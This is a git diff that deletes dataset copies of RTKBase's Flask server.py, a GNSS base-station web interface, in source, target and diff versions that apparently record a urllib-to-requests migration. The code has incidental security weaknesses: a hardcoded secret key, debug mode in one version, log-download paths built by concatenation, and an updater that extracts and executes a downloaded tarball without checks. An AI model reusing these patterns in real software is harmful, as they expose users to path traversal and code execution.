rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py deleted file mode 100644 index 6323cf8..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py +++ /dev/null @@ -1,463 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -from gevent import monkey -monkey.patch_all() -#import eventlet -#eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = True -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password is not "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state is not "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=False): - """ - check if an update exists - """ - new_release = None - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - new_release = None - socketio.emit("new release", new_release, namespace="/test") - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update().get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(3) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff deleted file mode 100644 index 0dfc46f..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/web_app/server.py b/web_app/server.py - index 16393d382e381c7ad49ef92451505a7418489e82..cf856c0cc9cbb0f810d59c9419f8789a1f9f5a80 100644 - --- a/web_app/server.py - +++ b/web_app/server.py -@@ -23,17 +23,17 @@ - # You should have received a copy of the GNU General Public License - # along with ReachView. If not, see . - --from gevent import monkey --monkey.patch_all() --#import eventlet --#eventlet.monkey_patch() -+#from gevent import monkey -+#monkey.patch_all() -+import eventlet -+eventlet.monkey_patch() - - import time - import json - import os - import signal - import sys --import urllib -+import requests - - from threading import Thread - from RTKLIB import RTKLIB -@@ -140,8 +140,8 @@ def check_update(source_url = None, current_release = None, prerelease=True, emi - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: -- response = urllib.request.urlopen(source_url) -- response = json.loads(response.read()) -+ response = requests.get(source_url) -+ response = response.json() - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') -@@ -170,10 +170,12 @@ def update_rtkbase(): - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" -- response = urllib.request.urlopen(update_url) -- with open(update_archive, "wb") as f: -- for chunk in response: -- f.write(chunk) -+ try: -+ response = requests.get(update_url) -+ with open(update_archive, "wb") as f: -+ f.write(response.content) -+ except Exception as e: -+ print("Error: Can't download update - ", e) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py deleted file mode 100644 index 5ca7616..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py +++ /dev/null @@ -1,471 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -from gevent import monkey -monkey.patch_all() -#import eventlet -#eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask import g -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = False -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password != "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state != "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=True, emit = True): - """ - check if an update exists - """ - new_release = {} - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - - if emit: - socketio.emit("new release", json.dumps(new_release), namespace="/test") - - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update(emit=False).get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" - -@app.before_request -def inject_release(): - g.version = rtkbaseconfig.get("general", "version") - -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(5) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py deleted file mode 100644 index 27136c3..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py +++ /dev/null @@ -1,473 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -#from gevent import monkey -#monkey.patch_all() -import eventlet -eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import requests - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask import g -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = False -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password != "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and 